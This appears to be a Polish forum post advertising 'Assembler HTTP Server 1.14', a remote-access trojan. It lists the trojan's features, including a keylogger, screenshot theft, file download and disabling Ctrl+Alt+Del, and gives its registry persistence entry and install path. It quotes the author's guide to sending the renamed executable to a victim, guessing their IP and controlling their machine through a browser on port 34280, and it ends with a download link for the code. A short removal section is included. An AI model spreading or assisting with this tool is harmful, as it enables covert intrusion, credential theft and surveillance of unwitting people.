:: Assembler HTTP Server 1.14
Klient: Przeglądarka Internetowa
Serwer: winhttp.exe
Rejestr: "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\Cur rentVersion\Run"
(wpis: "Windows HTTP SubSystem")
Lokalizacja: "C:\WINDOWS\System32\winhttp.exe"
Funkcje:
- Ukryj Pulpit
- Pokaż Pulpit
- Ukryj pasek zadań
- Pokaż pasek zadań
- Ukryj Start
- Pokaż Start
- Wyłącz Start
- Włącz Start
- Biały ekran
- Czarny ekran
- Odwróć kolory
- Uśpij
- Wyloguj
- Reset
- Wyłącz komputer
- Zamknij Windows
- Zamknij awaryjnie
- Zawieś (con/con)
- Zawieś (int 19h)
- Kaskada
- Okna poziomo
- Okna pionowo
- Lista okien
- Wysuń CD
- Wsuń CD
- Wygaszacz ekranu
- Zamień przyciski myszy (on)
- Zamień przyciski myszy (off)
- Opróżnij schowek
- Wyłącz Ctrl+Alt+Del
- Włącz Ctrl+Alt+Del
- Pobierz czas systemowy
- Czyść KeyLog
- Pobierz KeyLog
- Pobierz zdjęcie ekranu (zapakowane)
- Pobieranie plików
- Wyświetl komunikat
- Wyświetl informacje o dyskach
- Wyłącz AHS
Opis programu:
(Tekst napisany przez autora programu)
Co to jest AHS?
~~~~~~~~~~~~~~~
Najprościej mówiąc jest to trojan, który pozwala kontrolować zainfekowany
komputer za pośrednictwem protokołu HTTP oraz zwykłej przeglądarki
internetowej (np. Internet Explorer, Netscape Navigator, Opera). Zawiera
wszystkie najpotrzebniejsze funkcje takie jak: dostęp do plików na dyskach,
keylogger, generator komunikatów, menedżer okien oraz sporo różnego rodzaju
"bajerów".
Jak sie poslugiwac AHS?
~~~~~~~~~~~~~~~~~~~~~~~
W skrocie:
- wysylasz lamerowi plik winhttp.exe (nazwe mozesz zmienic na taka jaka ci sie
podoba)
- on go uruchamia
- zgadujesz IP lamera
- wpisujesz w przegladarce adres
http://ip_lamera:34280/`ahs ("`" to klawisz
znajdujacy sie pod Esc)
- pojawia sie interfejs trojana (lub nie pojawia sie jesli lamer ma ogniomurka
lub cos zjebales)
- teraz juz wiesz co robic
Jak wywalic AHS?
~~~~~~~~~~~~~~~~
Jezeli przypadkowo odpaliles plik winhttp.exe i chcesz wywalic trojana z
systemu:
- wpisujesz w przegladarce adres
http://localhost:34280/`ahs
- klikasz 'Wylacz AHS'
- uruchamiasz edytor rejestru (regedit.exe)
- idziesz do HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\Curr entVersion\Run
- usuwasz wartosc Windows HTTP SubSystem
- C:\WINDOWS\System32\winhttp.exe usuwasz ten plik
Co robic z plikami *.A36 oraz `zdj?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
A36 jest to format kompresji oparty na ApLibie 0.36 by Joergen Ibsen / Jibz.
AHS pakuje na niego np. screeny ekranu. Takiego zapakowanego screena ty mozesz
sciagnac z komputera ofiary jako plik o nazwie `zdj. Nalezy go rozpakowac
uzywajac zalaczonego programu un_a36, piszac po prostu w linii polecen:
un_a36 `zdj
lub
un_a36 plik.a36
Otrzymasz rozpakowana wersje pliku 'zdj, ktora jest zwyklym BMP-kiem i zajmuje
zwykle kilka megabajtow. Teraz ten plik 'zdj mozesz sobie otworzyc np. pod
paintem .
Kod:
http://rapidshare.com/files/19157333/ahs_1.14.rar